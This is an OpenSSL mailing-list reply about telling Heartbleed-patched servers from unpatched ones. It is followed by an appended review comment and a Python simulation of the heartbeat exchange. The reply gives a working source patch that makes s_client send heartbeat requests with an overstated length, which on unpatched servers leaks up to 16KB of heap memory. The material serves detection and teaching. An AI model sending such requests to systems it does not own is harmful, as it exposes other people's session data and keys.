On Wed, Apr 09, 2014 at 10:55:23AM -0400, Ted Byers wrote: > I get the heartbeating message on both unpatched and patched servers. > Should that make me worry about the patched machines?
No, unfortunately both patched and unpatched systems respond the same way to valid heartbeat requests as sent by s_client(1). To detect a difference, you need to send invalid heartbeat requests whose payload is shorter than promised. If you patch a copy of the source code for OpenSSL 1.0.1 as below, build it statically linked, and run "./apps/openssl s_client ..." from the build tree:

--- a/ssl/t1_lib.c
+++ b/ssl/t1_lib.c
@@ -2702,7 +2702,7 @@ tls1_heartbeat(SSL *s)
 	/* Message Type */
 	*p++ = TLS1_HB_REQUEST;
 	/* Payload length (18 bytes here) */
-	s2n(payload, p);
+	s2n(0x4000, p);
 	/* Sequence number */
 	s2n(s->tlsext_hb_seq, p);
 	/* 16 random bytes */

then you can detect the difference. Patched systems won't respond to the malformed heartbeat request.

Replace "echo B | ...." with something like:

    (sleep 10; echo B; sleep 10) | ...

to make sure that the handshake is complete by the time the request is sent, and the client does not disconnect too quickly.

-- 
	Viktor.

______________________________________________________________________
OpenSSL Project                                 http://www.openssl.org
User Support Mailing List                    openssl-users@openssl.org
Automated List Manager                           majord...@openssl.org
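Review bot: the context comment "/* Payload length (18 bytes here) */" is now misleading for the line that follows it, because `s2n(0x4000, p)` writes 16384 into the length field while the hunk leaves the 18-byte payload that tls1_heartbeat() actually emits (2-byte sequence number plus 16 random bytes, per the surrounding context lines) unchanged. Since the mismatch is the whole point of this test-only change, say so in the comment and give 0x4000 a named constant with that explanation instead of a bare magic number, so nobody later mistakes this for a fix or "corrects" the length back to `payload`.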
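Added example (not code from the OpenSSL project or from Viktor's mail): a Python model of the heartbeat message layer from RFC 6520 showing why the `s2n(0x4000, p)` change separates patched from unpatched peers. `s_client_request` builds the same message shape as the patched s_client above, and `process_heartbeat` plays the receiving side both without and with the bounds check the fix introduced. The sequence number, the 16 random bytes and the `adjacent_memory` stand-in for the server's heap are constructed inputs; the function names are this example's own.

```python
"""Model of the Heartbleed detection trick: overstate the heartbeat payload
length and see whether the peer answers.

Added example, not OpenSSL code. Only the HeartbeatMessage layer of RFC 6520
is modelled (no TLS record header, no encryption); "memory" is a constructed
stand-in for the heap that follows the received record.
"""
import struct
from typing import Optional

TLS1_HB_REQUEST = 1
TLS1_HB_RESPONSE = 2
PADDING_LEN = 16  # RFC 6520 section 4: at least 16 bytes of padding


def build_heartbeat(claimed_len: int, payload: bytes,
                    padding: bytes = b"\x00" * PADDING_LEN) -> bytes:
    """HeartbeatMessage: type(1) | payload_length(2) | payload | padding.

    claimed_len is written into the length field independently of the real
    payload size, which is what the s2n(0x4000, p) change in the mail does.
    """
    return struct.pack("!BH", TLS1_HB_REQUEST, claimed_len) + payload + padding


def s_client_request(seq: int, random16: bytes,
                     claimed_len: Optional[int] = None) -> bytes:
    """Mirror tls1_heartbeat(): payload = 2-byte sequence number + 16 random
    bytes (18 bytes). With claimed_len=None the true length is written, as an
    unmodified s_client does; claimed_len=0x4000 reproduces the patched one."""
    assert len(random16) == 16
    payload = struct.pack("!H", seq) + random16
    if claimed_len is None:
        claimed_len = len(payload)
    return build_heartbeat(claimed_len, payload)


def process_heartbeat(record: bytes, adjacent_memory: bytes,
                      patched: bool) -> Optional[bytes]:
    """Receiving side (the shape of tls1_process_heartbeat()).

    record          - the heartbeat record body as received; len(record) plays
                      the role of s->s3->rrec.length
    adjacent_memory - constructed bytes standing in for whatever follows the
                      record in the process heap
    patched         - apply the length checks added by the fix for CVE-2014-0160
    Returns the response message, or None if the request is silently dropped.
    """
    if patched and 1 + 2 + PADDING_LEN > len(record):
        return None  # too short to even carry type, length and padding
    if len(record) < 3:
        return None
    hbtype, payload_len = struct.unpack("!BH", record[:3])
    if hbtype != TLS1_HB_REQUEST:
        return None
    if patched and 1 + 2 + payload_len + PADDING_LEN > len(record):
        return None  # silently discard, as RFC 6520 section 4 requires
    # Unpatched behaviour: memcpy(bp, pl, payload) trusts the claimed length,
    # so the copy runs off the end of the record into adjacent memory.
    heap = record + adjacent_memory
    echoed = heap[3:3 + payload_len]
    return struct.pack("!BH", TLS1_HB_RESPONSE, payload_len) + echoed \
        + b"\x00" * PADDING_LEN


def classify(response: Optional[bytes], sent_claimed_len: int) -> str:
    """Interpret what came back after sending the overstated-length request."""
    if response is None:
        return "no heartbeat response: patched (or heartbeats disabled)"
    hbtype, payload_len = struct.unpack("!BH", response[:3])
    if (hbtype == TLS1_HB_RESPONSE and payload_len == sent_claimed_len
            and len(response) >= 3 + payload_len):
        return "response echoing the overstated length: unpatched"
    return "unexpected response"


if __name__ == "__main__":
    req = s_client_request(seq=1, random16=bytes(range(16)), claimed_len=0x4000)
    # Constructed heap contents next to the record; real servers hold real data.
    memory = b"session cookie=SECRET;" + b"\x00" * 0x4000
    print("patched:  ", classify(process_heartbeat(req, memory, True), 0x4000))
    print("unpatched:", classify(process_heartbeat(req, memory, False), 0x4000))
```

The model reproduces the two observations in the mail: a well-formed 18-byte request is answered identically by both sides, so it cannot tell them apart, while the request whose length field says 0x4000 gets no answer from the checked path and a 16384-byte echo from the unchecked one.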